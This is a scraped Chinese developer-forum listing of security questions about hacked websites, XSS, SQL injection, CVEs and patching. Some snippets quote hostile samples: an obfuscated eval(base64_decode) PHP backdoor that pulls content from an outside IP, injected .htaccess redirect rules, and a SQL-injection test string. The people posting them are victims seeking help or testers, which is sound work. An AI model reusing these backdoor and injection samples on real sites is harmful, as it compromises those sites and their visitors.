腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
视频
沙龙
2
回答
JavaScript网站漏洞
、
、
今天早上我注意到我的网站上有一个可能的漏洞,我一点也不确定我的网站是否会被损坏,但是. 在我的网站上,我使用JavaScript代码打开(显示)主页内的不同部分(其他页面); 在主index.php上,我有下面的代码,其中显示了其他页面: 头部: <?php $section = "default"; if (isset($_GET["page"])) { $section = $_GET["page"]; } ?> 在身体中: <script type="text/javascript"> o
浏览 6
提问于2015-08-30
得票数 1
回答已采纳
1
回答
有人能给我解释一下去年的reddit漏洞吗?
、
、
、
去年,一个用户成功地将任意javascript注入到reddit的markdown语法中。谁能解释一下这是如何做到的,以及我如何测试我的网站是否也同样易受攻击?
浏览 0
提问于2010-03-06
得票数 5
3
回答
哪些网站是脆弱的?
、
、
众所周知,安全漏洞在网络上很常见:许多网站都很容易受到攻击。是否有任何数据说明哪些网站是脆弱的,哪些部分是安全的?
浏览 0
提问于2012-03-14
得票数 5
回答已采纳
3
回答
旧的Wordpress版本还安全吗?
我用https://hackertarget.com/wordpress-security-scan/检查了一个Wordpress实例,它告诉我Wordpress版本是4.7.9,我应该更新。是的,当前版本为4.9.2,但根据本页: https://codex.wordpress.org/WordPress_版本 所有分支从3.7。最近更新(1月16日)。那么,这不意味着所有这些版本都应该和最新的4.9.2一样安全吗? 我希望有很好的论据,说服网站管理员升级他们的wordpress。我个人总是想要安装最新的版本,但我想知道什么是真正的线程,指出它的懒惰的网站管理员。 例如,我如何告诉仍在运行4
浏览 0
提问于2018-01-19
得票数 1
回答已采纳
1
回答
运行在服务器上显示病毒警告的网站
、
、
、
、
我在Ubuntu8.04LTS上运行Plesk9.5,大约有15个网站被一些恶意代码附加到java文件的末尾。我已经安装了Clamav,它成功地收集了受感染的文件,这些文件的模式为/kmae9gr6m/或/gootkitstart/,以/qhk6sa6g1c/或/gootkitend/结束。 我的Plesk面板是最新的,并安装了安全修补程序。如何隔离服务器上的安全漏洞?
浏览 0
提问于2012-06-25
得票数 0
回答已采纳
2
回答
我想测试我的网站,你推荐什么工具?
、
我已经下载了我的网站/数据库,并在Centos 7服务器本地重新创建它。我想给它一个很好的锤击,以便找到和修复任何漏洞。有人能推荐一款能帮我完成这个功能的软件吗?开源就太棒了!
浏览 0
提问于2016-09-27
得票数 -5
1
回答
CloudFlare是否可以保护底层操作系统和web服务器免受漏洞攻击?
我知道CloudFlare可以保护您的应用程序免受SQL和XSS注入等攻击。但是操作系统和web服务器呢? 例如,如果我的网站托管在IIS/Windows上,CloudFlare是否也可以保护我的服务器免受操作系统漏洞和/或IIS漏洞的攻击?
浏览 2
提问于2015-12-29
得票数 0
2
回答
CVSS和链式漏洞
、
假设一个网站有两个漏洞: 信息披露 反射XSS 它们本身的影响在特定的网站上是有限的,但是当它们被链接在一起时,其影响就太高了(例如将钱转移到另一个帐户)。 怎样才是最合适的方法来展示这些弱点? 关于集思广益,我想说至少有三种选择: 只是有这两个漏洞,而不考虑链式影响。 将这两个漏洞合并为一个具有很大影响的漏洞。 有三个漏洞,最初的两个加上两个链接时受影响的关键功能。 第一个选项看起来不合适,第三个选项,列出一个额外的漏洞可能是多余的。第二个选项看起来不算太糟,但如果两个漏洞本身就很重要,那么这两个漏洞都有自己的位置可能更合适。
浏览 0
提问于2019-12-11
得票数 2
3
回答
一个网站如何从代码注入中恢复,特别是域名?
、
、
、
、
我的网站最近被黑客入侵,显然它是代码注入漏洞,而不是SQL注入。至少这是Google告诉我的,甚至给了我一个可能的iframe代码。这对我来说是个打击,因为我的网站从来没有发生过这种情况。我发现最近我正在我的webserver上测试upload php脚本,然后忘了删除它。所以我知道他们是怎么进来的。因此,我继续记录所有我看到的不属于服务器的东西,包括upload php脚本。另外,我在.htaccess文件中看到了一些有用的东西。我没有检查代码,而是从服务器上完全删除了它。 不管怎样,我试着尽我所能,就像人们在网上建议的那样。尽管如此,黑客并没有完全消失,也没有完全消失。所以,我认为够了就够
浏览 0
提问于2012-07-30
得票数 -1
回答已采纳
1
回答
如何修复到Joomla1.5URL重定向漏洞?
、
、
我今天在我的网站上发现了一个问题 此漏洞将我的访问者发送到自定义url "ya.ru“。 在这里,您可以看到漏洞是什么 帮助找出修复方法,请提前谢谢
浏览 2
提问于2012-10-28
得票数 0
回答已采纳
1
回答
仅仅点击恶意/病毒链接,我的电脑就会被黑客入侵吗?(2020更新)
、
、
我将重新提出一个更准确的问题。如果我单击恶意/病毒链接,则不再单击任何内容或从该网站下载任何内容,我的PC会被黑客攻击吗?我是从一个web开发者的角度,通过所有的工具和编程语言来问这个问题的。
浏览 22
提问于2020-06-18
得票数 0
回答已采纳
1
回答
npm安装漏洞审计
我正在制作一个带有node express后端的网站,它从公共目录中提供react应用程序。我的电脑运行得很好,我把所有这些都放到了AWS服务器上,为我的服务器运行了npm install,为我的应用程序在公共目录中运行了npm install,这就是我得到消息的地方: /public$ npm audit fix up to date, audited 1960 packages in 5s # npm audit report public * Severity: high Cross-Site Scripting - https://npmjs.com/advisories/10
浏览 6
提问于2021-01-08
得票数 1
2
回答
如何保护我的.htaccess网站免受网址重定向恶意脚本攻击?
、
这个.htaccess文件是如何用恶意代码注入到网站中的? <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*(msn|search|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC] </IfModule> 如何防止我的网站受到相同的攻击? 这个链接在某种程度上是有用的,直到 但我的团队希望我的使用编码保护网站。这有可能吗? 我还发现,很少有其他网站受到类似的
浏览 2
提问于2012-11-05
得票数 1
回答已采纳
2
回答
从其他域读取cookies
、
我听说过人们能够使用XSS访问其他网站的cookie。这是一个合法的选择吗?你如何实现这一点?
浏览 2
提问于2010-10-29
得票数 2
回答已采纳
1
回答
从CVE和MSB收集信息编写概念证明
、
我目前感兴趣的是如何为CVE和微软安全通讯每月发布的漏洞编写一些概念代码的证明。 这些网站列出了已经发生的漏洞,但没有解释漏洞是如何工作的。例如,Microsoft安全公告有一个非常通用的行,描述该漏洞是如何工作的- 巧尽心思构建的Microsoft文件 这没有给出任何信息,该漏洞是如何工作的。CVE也是有限的。我不明白为什么没有提供信息,因为补丁已经发布了。 网络上是否有我能知道最近发布的漏洞是如何工作的资源?
浏览 0
提问于2014-12-14
得票数 0
1
回答
来自未知用户的上千封邮件发送到我的网站!网站即将被谷歌列入黑名单
最近,我的一位员工在WordPress上开发了一个网站。一切都很好,直到我们收到一封来自谷歌的电子邮件,通知我,一些能真正造成安全问题的东西正在WordPress网站上运行。在检查FTP时,我发现了一个不寻常的文件夹!!我无法删除或修改它。该文件的权限是与文件夹所有者,更改,最奇怪的是,我没有权限!因此,我更新了WordPress,认为它可以解决这个问题。再次,它是固定了一段时间,但现在我收到1000多封电子邮件,从一个未知的帐户。网站的邮件服务器被淹了,客户端着火了!我怀疑这是DOS攻击(拒绝服务)。我怎么才能解决这个问题?任何建议都会使我负债累累。提前谢谢你!!
浏览 0
提问于2014-07-13
得票数 0
1
回答
Facebook推荐在我的网站上显示一些Tiwan网站的url?
、
我在我的博客( )上使用Facebook推荐来显示最喜欢/分享的内容。今天,我注意到我的网站推荐中最顶端的链接来自一个未知的网站,网址为"“。 有人能帮我摆脱这个垃圾链接吗?
浏览 8
提问于2011-11-01
得票数 0
回答已采纳
2
回答
什么是CVE安全更新?谁发布这些更新?
、
只是几个简单的问题。希望一对聪明的猫头鹰能够回答;) 我过去不小心地通过终端应用更新,因为我不使用任何ppa或任何不受信任的应用程序,但最近我对Ubuntu bug、它们的修复以及最重要的是对我的系统所做的更改感兴趣。因此,我发现使用“更新管理器”更容易,这样我就可以使用“更改”部分中的链接访问讨论这些问题的“启动板”页面。 今天,当提示我进行一些特定的更新时,我被引导到一个未知的'mitre.org‘页面,而不是指向我习惯的'launchpad’页面。 截图: 更新管理器-更改 米特雷 我已经搜索了askubuntu网站,以及其他网站,但我发现只有一个线程可以接近回答我的问题
浏览 0
提问于2013-09-19
得票数 1
回答已采纳
1
回答
站点对站点VPN不适用于特定的子网。
、
我们正在使用思科5500系列ASA的网站总部和BX和有一个站点之间的vpn, BX (子网192.168.6.0)可以在总部访问子网192.168.200.0,但不能在总部访问192.168.0.0子网。 数据包跟踪显示数据正在被传输到两个站点,但是它会下降。我找不到问题的根源。我感觉到它是关于路由的,但不能指出问题所在。 我知道张贴日志对我来说更好,但我不知道怎么做。我需要帮忙,在这里。 谢谢,新年快乐。K.
浏览 0
提问于2013-01-02
得票数 1
1
回答
升级debian上的openssh
、
我在谷歌云计算上运行一个网站,该网站使用debian。我们最近进行了一次安全审计,其中一项建议是将OpenSSH从7.4升级到7.8或更高版本。apt显示 openssh-server/oldstable,now 1:7.4p1-10+deb9u6 amd64 [installed,upgradable to: 1:7.4p1-10+deb9u7] 看起来,我们通过apt进行升级的最好方法是升级到稍新的7.4版本。是否有办法将其强制到7.8,还是需要一个新内核?我可以删除源代码,编译并安装它,但这会破坏系统上的其他东西吗?这是一个生产网站,所以我不想要任何惊喜。
浏览 0
提问于2020-08-05
得票数 1
2
回答
mysql在php linux上入侵
、
、
我有一个网站和mysql数据库表中的条目被删除或更改了值。 我很快就找到了那个黑客,但他只做了一些小小的改动。 我在网站上有一些表格。他有可能注射过吗? 怎么弄清楚他是怎么做到的?首先要测试的东西是什么?
浏览 0
提问于2010-09-26
得票数 0
1
回答
许多网站没有在Ubuntu16.04中加载
、
我已经面对这个问题很长时间了。许多网站,如pinterest,linkedin等,过去都没有加载(用于chrome ERR_EMPTY_RESPONSE)。在寻找了一段时间之后,我找到了一个涉及更改mtu ifconfig enp7s1 mtu 1496的解决方案。它解决了大部分问题。但是现在,我面临身份验证的问题,比如登录到任何网站,或者创建一个新的帐户或密码恢复。我也遇到了这个网站的密码恢复问题(虽然登录时没有任何问题)。 我尝试过不同的浏览器,清除缓存和其他的东西,但似乎没有任何工作。有什么解决办法的建议吗?
浏览 0
提问于2017-04-16
得票数 1
2
回答
ASP.NET单点登录不起作用,尽管存在matchin machineKey和身份验证设置
、
、
我有一个单一的网站,可以到达我们的开发系统和我的本地机器。通过修改我的主机文件,我试图使SSO工作。但事实并非如此,尽管这两个网站实际上是完全相同的。 奇怪的是,SSO只在网站的其他副本托管在特定的开发机器上时才能工作。如果我将它设置在另一台机器和我的本地机器上,那么SSO工作就完美无缺了。 开发系统和我的机器之间唯一的区别是操作系统和事实,即网站是在开发机器上预编译的。 同样有趣的是,当每个站点都托管在开发系统上时,SSO也能工作。 ,除了web.config?的machineKey部分之外,在计算机或网站上是否有任何影响表单身份验证cookie的加密和解密的内容? 值得注意的是,由开发系统
浏览 5
提问于2011-08-31
得票数 1
1
回答
Firefox 7.0.1损坏的内容错误
、
、
当我试图使用Firefox 7.0.1从我的网站下载一些东西时,我得到了以下错误: 损坏内容错误 由于检测到数据传输中的错误,无法显示要查看的页。请与网站所有者联系,告知他们这个问题。 我使用Java输入流从我的网站下载内容。 有谁可以帮我?
浏览 3
提问于2011-11-18
得票数 0
1
回答
几乎我们服务器中的所有网站都重定向到色情欺诈网站。
、
、
我们的服务器出现了问题。在将文件转移到一个新的专用服务器后,仅在一到两周内,我们服务器下的几乎每个网站都会重定向到porno诈骗网站(直截了当地说到adultfinder网站)。一旦你输入网址,它将重定向到它,一旦你再次输入它,你现在是在原来的网站。
浏览 0
提问于2013-09-20
得票数 0
1
回答
yahoo oauth和oauth2.0登录故障
、
、
用户使用雅虎OAuth 1.0访问我们的网站,但失败了,并有以下行为。 1.重定向到 2.显示登录页,输入登录名。 3.输入密码 4.装货一段时间后.它将返回到步骤2中的登录页。 重复步骤2-3 在没有上述错误的情况下,它确实能正常工作。 然后,当我们请求'xoauth_yahoo_guid‘时,使用雅虎OAuth 2.0更新我们的系统,但是sesponse不包括字段: { "access_token": "XXXXXXXXX", "refresh_token": "XXXXXXXXXXXXX",
浏览 2
提问于2018-08-21
得票数 3
2
回答
如果注入查询正确,则可能进行重定向到网页的SQL注入。
、
、
在我朋友的授权下,我正在测试他的网站是否存在潜在的漏洞。 我试图找出是否能够将SQL查询注入POST请求参数hi' or 1=1 --。 query=hi'%20or%201%3d1%20-- 我发现文件打印出来了: <div class="error">index job,query: syntax error, unexpected '-' near '-'</div> 在使用' or 0=0 --时,我得到: <div class="error">index job
浏览 5
提问于2020-01-18
得票数 0
1
回答
Json劫持不起作用
、
我已经修补了我的网站,以防止JSON劫持。在此过程中,我感兴趣的是是否能够实际利用此漏洞。 因此,我创建了一个foo.html,添加了一个脚本标记,其中的源属性引用了我登录的站点。我无法利用这个漏洞。我查看了网络流量,但没有看到我的身份验证cookie正在请求中传递。 这是否意味着大多数浏览器已经修复了该漏洞?有什么表格能让我知道哪些浏览器修复了它吗?还是我完全误解了这个弱点? https://capec.mitre.org/data/definitions/111.html
浏览 0
提问于2020-02-26
得票数 1
3
回答
站点后门& eval()
、
、
我在运行一个Joomla 1.7网站,它今天被黑了。下面的脚本完成了黑客攻击。 eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJ
浏览 4
提问于2013-02-20
得票数 3
回答已采纳
1
回答
使用code=H10 desc=的heroku部署“应用程序崩溃”
、
、
在heroku中部署nodejs服务器后,我收到以下错误 2020-09-21T07:29:21.142276+00:00 at=error路由器:at=error code=H10 desc=“应用崩溃”method=GET path=/“. 2020-09-21T07:29:21.697275+00:00 at=error路由器:at=error code=H10 desc=“应用程序崩溃”method=GET path="/favicon.ico“. 我已经在我的package.json中添加了引擎{node,npm},并在heroku仪表板的Config Vars中添加了mo
浏览 14
提问于2020-09-21
得票数 0
1
回答
ReactJS中的安全漏洞或漏洞?
、
我正在尝试找出ReactJS可能会发生的安全问题,但我很难找到任何问题。在谷歌上快速搜索Angular,就会找到一些有用的网站。它们是给ReactJS的吗?或者有人能解释一下吗?
浏览 0
提问于2015-05-14
得票数 13
回答已采纳
1
回答
修复Azure Defender和安全中心漏洞评估所需的角色是什么?
、
要补救Azure中的所有漏洞评估建议,我需要请求哪些角色?
浏览 10
提问于2021-10-25
得票数 0
1
回答
禁用的端口与UFW,但外部扫描仍然显示他们是开放的?
、
、
、
UFW状态详细: 📷 这是来自验证员网站的外部扫描结果。 📷 因此,我的理解是,除了22和443之外,所有端口都应该关闭,但从扫描的角度来看,其他端口仍然是开放的。我做错什么了?
浏览 0
提问于2018-01-29
得票数 2
2
回答
PostgreSQL数据库中"sqlmapoutput“表的存在
、
、
、
我在一个客户端的数据库中,在一个用户创建的模式中看到了这个表"sqlmapoutput“。它是一个PostgreSQL数据库管理系统。他不知道它是怎么来的。该表中没有数据: Table: sqlmapoutput [0 entries] +------+ | data | +------+ +------+ 经过检查,我发现他的站点中有一个基于布尔的盲sqli。那么,如果他的网站被攻破,为什么有人会离开这张桌子呢?像sqlmap这样的东西有什么理由来创建这样的东西吗? PS:不需要解释其他问题,只需关注这个表格的存在,请注意。
浏览 0
提问于2016-01-03
得票数 3
2
回答
如何解决Spring漏洞(CVE-2022-22965)?
、
、
、
、
更新 现在将此问题分配给。除了下面好的答案,请检查,因为它是这个问题最可靠和最新的网站。 根据不同的来源,似乎我们在使用Spring库时遇到了严重的安全问题。 引用上述链接,我们面临风险,如果: 您使用一个Spring (包括5.3.17版本),您的应用程序运行在Java 9+上 使用与name=value对的表单绑定--而不是使用Spring更流行的JSON/XML消息转换 您不使用允许列表-或-您没有阻止“类”、“模块”、“classLoader”等字段的denylist 该链接建议到某些解决方案,但似乎不容易实现/可靠。我们应该如何以最简单和最可靠的方
浏览 1
提问于2022-03-31
得票数 3
回答已采纳
1
回答
SonarQube Java路径遍历攻击
、
、
我有一些删除文件的方法。我使用SonarQube对我的代码进行静态分析。 方法代码: private static void removeFile(MyClass someValue) { Path filePath = Paths.get(someValue.getRootFolderPath(), someValue.getRelativePath()); if (!Files.exists(filePath)) { LOG.warn("File does not exist", filePath.toAbsolutePath().toSt
浏览 1
提问于2018-03-15
得票数 3
2
回答
是否有可能在不知情的情况下下载病毒并在网站打开时运行?
、
、
通常,我唯一看到病毒发生的时候是有人错误地运行了一个受感染的文件。但是,仅仅访问一个网站也会感染吗?
浏览 0
提问于2016-03-08
得票数 2
1
回答
雅虎OAuth 2.0登录故障
、
今天,当我试图使用雅虎OAuth 2.0访问我的组织SSO网站时,它失败了,并且有以下行为。 启动雅虎OAuth流,所以它现在在内部 显示登录页,键入登录名。 输入密码 装货一段时间后..。它将返回到步骤2中的登录页。 重复Step 2-3 在没有上述错误的情况下,它肯定是在工作的,其他人也经历过同样的错误并且/或知道如何解决这个问题吗?
浏览 1
提问于2018-08-14
得票数 3
回答已采纳
1
回答
如何消除“安全更新可用”警告?
、
、
我在我的网站上使用ShareThis模块。不幸的是,最近的2.3版被标记为安全更新,但是它有一个主要的错误 (设置无法保存)。我已恢复到2.2版。 其结果是‘安全更新可用’警告总是显示在管理屏幕上。有可能把它们处理掉吗?我试图找到一个选择,但找不到任何选择。
浏览 0
提问于2012-04-07
得票数 2
1
回答
谷歌重定向
、
当用户试图通过在谷歌或其他搜索引擎中输入我的网站时,他们会被重定向到一个垃圾邮件网站阿伯克龙比&惠誉网站。
浏览 0
提问于2013-10-16
得票数 0
1
回答
我正在为绝地求生创建一个统计网站,我似乎无法得到总人数
、
因此,目前我正在绝地求生的统计网站上工作(我知道这已经做了10亿次了,但这是一个有趣的项目),但我似乎无法在正式的player中找到玩家总数。我知道有一个方法可以得到球员的数量,但我一直在经历蒸汽和绝地求生的官方api,我找不到它。有人知道从哪弄到这个吗?
浏览 0
提问于2018-09-19
得票数 1
回答已采纳
1
回答
添加了site.xml和/good目录
、
、
、
、
我在做一个被黑的wordpress网站。乍一看,我看到了一个site.xml文件和一个/good目录,放在网站的根目录上。 site.xml包含以下头字符串: <urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
浏览 0
提问于2015-06-04
得票数 0
回答已采纳
2
回答
安全问题
、
我的网站有一个安全问题。一个脚本代码被添加到我的所有页面,就像"<script src="Ip address/viewpic.asp"></script>“一样。它位于</head>和<body>标签之间。现在谷歌说“这个网站可能对你的电脑有害!”关于我的网站。如何保护我的网站?我使用C#和Visual Studio2008。
浏览 2
提问于2010-04-28
得票数 2
2
回答
MySQL注入预防
、
、
、
黑客通过sql注入和运行虚假查询攻击我的网站,如何防止他们需要帮助。 是否有防火墙可以防止黑客攻击等,或者我应该使用mysql_real_escape_string($_REQUEST);
浏览 3
提问于2012-08-06
得票数 0
3
回答
将OpenSSH 7.4升级到RHEL的后面
、
、
、
我有一个服务器(7.5x86_64)。我有OpenSSH 7.4版。出于安全考虑,我被要求将其升级到更高版本: Nessus声明OpenSSH应从7.4级上调至7.6级或更高级别。然而,红帽软件和下载没有最新的软件包RPM。 我发现了一些关于从哪里获得OpenSSH最新包的线索。我发现了此链接,然而,我不知道如何升级它和信任这个网站。我不希望升级修改SSH和其他配置。 我确实找到了链接,但是它们并不有用,例如这一个。 我想知道如何在不使用OpenSSH的情况下升级yum。
浏览 0
提问于2018-12-05
得票数 1
1
回答
URL重写位置导致移动到此处的对象链接出现在站点上
、
、
我在IIS8.0上有一个MVC站点,我最近运行了一次安全扫描,但是失败了,说我的内部IP地址是在HTTP响应头上设置的。为了缓解这个问题,我安装了URL重写,并创建了一个出站规则来替换变量名RESPONSE_Location,使用通配符并用空字符串替换它。这样做会导致在访问网站或单击任何链接时出现一个已移动的对象链接。任何帮助都是非常感谢的。
浏览 0
提问于2018-04-13
得票数 0
回答已采纳
1
回答
FB发送功能
、
不知道我是不是真的很笨,但是,我试图在一个网站上设置发送按钮,我得到了一个错误: 我们在发送邮件时遇到以下错误:需要公共电子邮件地址:要发送到电子邮件地址,首先要设置自己的facebook.com电子邮件地址 有人能说点什么吗?
浏览 1
提问于2012-01-01
得票数 1
回答已采纳
3
回答
如何检查我的服务器和magento站点是否符合PCI
、
是否有任何工具可以检查站点和服务器的PCI合规性。 此外,这将是伟大的,如果我知道我可以让我的服务器和magento网站PCI合规性。 谢谢
浏览 0
提问于2016-07-31
得票数 1
1
回答
一开始,我应该去哪里找秃鹫?大赏金网站还是小项目?
、
、
我是一个业余的web应用程序安全爱好者,我想说的是在这一点上是一个中级的知识水平。我有兴趣找到全职工作,作为一个网页应用笔测试。 到目前为止,我主要致力于在本地托管的易受攻击的web应用程序。 我想要开始做实际的漏洞研究,并试图得到一些CVE列出的错误我的名字。我认为,缺乏学位或直接相关的工作经验,这基本上是一个投资组合,并表明熟练。 我的问题是我应该从哪里开始寻找? 我是否应该瞄准那些高调的网站,提供像Bug群上列出的那些赏金呢? 或者更好的方法是审计较小的开源项目并将我的发现提交给他们的团队? 我的想法是,更大的高调网站将受到更严格的审查,所以当你没有那么有经验的时候,找出有趣的问题的机会
浏览 0
提问于2014-02-24
得票数 0
2
回答
ASP.NET:寻找解决XSS的解决方案
、
我们有一个长期运行的网站,XSS潜伏在那里。问题来自于一些开发人员--没有使用HtmlEncode/Decode()--直接检索请求“某某物”来完成这个过程,并将其放到web上。 我想知道是否有像HTTPModule这样的机制来帮助我们在某种程度上避免XSS请求中的HtmlEncode()所有项。 感谢你的任何建议。 里格斯,里基
浏览 3
提问于2009-11-10
得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
maccms网站漏洞修复方案
网站漏洞扫描修复php代码详情
针对网站漏洞修复区块链漏洞之以太坊
网站漏洞修复方案防止SQL注入攻击漏洞
网站服务器漏洞修复之php版本泄露源码
热门
标签
更多标签
云服务器
ICP备案
实时音视频
云直播
对象存储
活动推荐
运营活动
广告
关闭
领券